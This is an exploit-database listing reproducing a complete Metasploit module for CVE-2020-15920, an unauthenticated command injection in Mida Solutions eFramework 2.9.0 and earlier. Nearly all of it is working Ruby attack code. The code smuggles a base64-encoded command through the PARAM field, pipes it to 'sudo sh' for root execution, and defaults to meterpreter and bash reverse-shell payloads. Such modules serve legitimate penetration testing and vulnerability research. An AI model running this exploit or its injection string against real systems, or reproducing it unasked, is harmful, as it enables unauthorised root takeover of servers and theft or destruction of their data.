Mida Solutions eFramework ajaxreq.php Command Injection Exploit

2020-09-16T00:00:00
ID 1337DAY-ID-34943
Type zdt
Reporter metasploit
Modified 2020-09-16T00:00:00

Description

This Metasploit module exploits a command injection vulnerability in Mida Solutions eFramework version 2.9.0 and prior. The ajaxreq.php file allows unauthenticated users to inject arbitrary commands in the PARAM parameter to be executed as the apache user. The sudo configuration permits the apache user to execute any command as root without providing a password, resulting in privileged command execution as root. This module has been successfully tested on Mida Solutions eFramework-C7-2.9.0 virtual appliance.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mida Solutions eFramework ajaxreq.php Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability in Mida
          Solutions eFramework version 2.9.0 and prior.

          The `ajaxreq.php` file allows unauthenticated users to inject
          arbitrary commands in the `PARAM` parameter to be executed as
          the apache user. The sudo configuration permits the apache user
          to execute any command as root without providing a password,
          resulting in privileged command execution as root.

          This module has been successfully tested on Mida Solutions
          eFramework-C7-2.9.0 virtual appliance.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'elbae', # discovery and exploit
            'bcoles', # Metasploit
          ],
        'References' =>
          [
            ['CVE', '2020-15920'],
            ['EDB', '48768'],
            ['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'],
          ],
        'Payload' => { 'BadChars' => "\x00" },
        'Targets' =>
          [
            [
              'Linux (x86)', {
                'Arch' => ARCH_X86,
                'Platform' => 'linux',
                'DefaultOptions' => {
                  'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
                }
              }
            ],
            [
              'Linux (x64)', {
                'Arch' => ARCH_X64,
                'Platform' => 'linux',
                'DefaultOptions' => {
                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
                }
              }
            ],
            [
              'UNIX (cmd)', {
                'Arch' => ARCH_CMD,
                'Platform' => 'unix',
                'DefaultOptions' => {
                  'PAYLOAD' => 'cmd/unix/reverse_bash'
                }
              }
            ]
          ],
        'Privileged' => true,
        'DisclosureDate' => '2020-07-24',
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'DefaultTarget' => 1,
        'Notes' =>
          {
            'Stability' => [ CRASH_SAFE ],
            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
            'Reliability' => [ REPEATABLE_SESSION ]
          }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Base path to eFramework', '/'])
    ])
  end

  def check
    res = execute_command('id')

    unless res
      return CheckCode::Safe('Connection failed')
    end

    unless res.body.include?('uid=')
      return CheckCode::Safe('Target is not vulnerable')
    end

    CheckCode::Vulnerable
  end

  def execute_command(cmd, _opts = {})
    vars_post = {
      'DIAGNOSIS' => ['PING', 'TRACEROUTE'].sample,
      'PARAM' => ";echo #{Rex::Text.encode_base64(cmd)}|base64 -d|sudo sh"
    }

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'PDC', 'ajaxreq.php'),
      'vars_post' => vars_post
    }, 5)

    if res && !res.body.blank?
      vprint_status("Command output: #{res.body.gsub(/<br>/, "\n")}")
    end

    res
  end

  def exploit
    if target.arch.first == ARCH_CMD
      execute_command(payload.encoded)
    else
      execute_cmdstager(linemax: 1_500, background: true)
    end
  end
end